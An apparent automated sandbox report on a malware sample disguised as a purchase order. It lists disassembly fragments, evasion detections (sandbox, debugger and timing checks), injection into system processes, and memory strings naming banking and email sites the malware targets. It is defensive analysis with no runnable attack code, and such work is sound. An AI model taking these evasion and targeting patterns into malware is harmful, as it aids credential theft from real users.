            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2-2401-0016 (TR).exe, 00000000.00000003.2059592529.00000000040A0000.00000004.00001000.00020000.00000000.sdmp, PO2-2401-0016 (TR).exe, 00000000.00000003.2061283360.0000000004240000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2279732575.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2184300413.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2279732575.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2182333043.0000000003500000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000005.00000003.2282930562.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000003.2284887990.0000000002C85000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002E30000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4509793965.0000000002FCE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000005.00000002.4510222204.000000000345C000.00000004.10000000.00040000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2626008848.000000002F2AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2247452645.0000000003F01000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2247372843.000000000321A000.00000004.00000020.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4513030098.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000003.00000002.4509012670.0000000001498000.00000004.00000020.00020000.00000000.sdmp
            Source: PO2-2401-0016 (TR).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PO2-2401-0016 (TR).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PO2-2401-0016 (TR).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PO2-2401-0016 (TR).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PO2-2401-0016 (TR).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001542DE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00170A76 push ecx; ret 0_2_00170A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A7 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406005 push ds; ret 2_2_00406010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408818 push edi; ret 2_2_004088A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A29 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414CD3 push edi; iretd 2_2_00414CE1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004144AE push ebx; iretd 2_2_004144AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401566 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401522 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004145E3 push edx; ret 2_2_00414605
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040159A push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406FD7 push cs; ret 2_2_00406FD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407784 push esi; iretd 2_2_0040779A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EF85 pushad ; ret 2_2_0041EF4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AF8E push ebp; retf 2_2_0040AFA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004037A0 push eax; ret 2_2_004037A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390225F pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039027FA pushad ; ret 2_2_039027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390283D push eax; iretd 2_2_03902858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03901368 push eax; iretd 2_2_03901369
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04894EE9 push ebx; iretd 3_2_04894EEA
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0489570E push edi; iretd 3_2_0489571C
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_048968BC pushfd ; ret 3_2_04896917
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_048881BF push esi; iretd 3_2_048881D5
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0489F9C0 pushad ; ret 3_2_0489F986
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_0488B9D2 push ebp; retf 3_2_0488B9DD
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04887A12 push cs; ret 3_2_04887A13
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04886A40 push ds; ret 3_2_04886A4B
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exeCode function: 3_2_04889253 push edi; ret 3_2_048892DF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_02E609AD push ecx; mov dword ptr [esp], ecx5_2_02E609B6
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0016F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0016F98E
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001E1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001E1C41
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-99048
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeAPI/Special instruction interceptor: Address: 36E0684
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeWindow / User API: threadDelayed 9842Jump to behavior
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeAPI coverage: 3.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788Thread sleep count: 131 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788Thread sleep time: -262000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788Thread sleep count: 9842 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 2788Thread sleep time: -19684000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428Thread sleep time: -95000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428Thread sleep count: 43 > 30Jump to behavior
            Source: C:\Program Files (x86)\UitBsLBBtIhbRyKjvsYbYyvztghwWCAxcjOnCLIkfdStXzBftcpTNTYwbKrQbDaPonH\WwOlfblnYaWmLq.exe TID: 6428Thread sleep time: -43000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_0018C2A2 FindFirstFileExW,0_2_0018C2A2
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C68EE FindFirstFileW,FindClose,0_2_001C68EE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_001C698F
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001BD076
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_001BD3A9
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C9642
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_001C979D
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_001C9B2B
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_001BDBBE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_001C5C97
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 5_2_0035C380 FindFirstFileW,FindNextFileW,FindClose,5_2_0035C380
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001542DE
            Source: 7466H3538.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 7466H3538.5.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 7466H3538.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 7466H3538.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 7466H3538.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 7466H3538.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 7466H3538.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 7466H3538.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.0000000000692000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2627419772.000002126F1CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7466H3538.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: 7466H3538.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 7466H3538.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 7466H3538.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 7466H3538.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: 7466H3538.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: 7466H3538.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4509351410.00000000010DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
            Source: 7466H3538.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 7466H3538.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 7466H3538.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A93 LdrLoadDll,2_2_00417A93
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001CEAA2 BlockInput,0_2_001CEAA2
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00182622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00182622
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001542DE
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_00174CE8 mov eax, dword ptr fs:[00000030h]0_2_00174CE8
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_036E0950 mov eax, dword ptr fs:[00000030h]0_2_036E0950
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_036E08F0 mov eax, dword ptr fs:[00000030h]0_2_036E08F0
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_036DF2D0 mov eax, dword ptr fs:[00000030h]0_2_036DF2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928397 mov eax, dword ptr fs:[00000030h]2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h]2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395438F mov eax, dword ptr fs:[00000030h]2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h]2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h]2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h]2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h]2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h]2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h]2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h]2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039663FF mov eax, dword ptr fs:[00000030h]2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h]2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h]2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov ecx, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
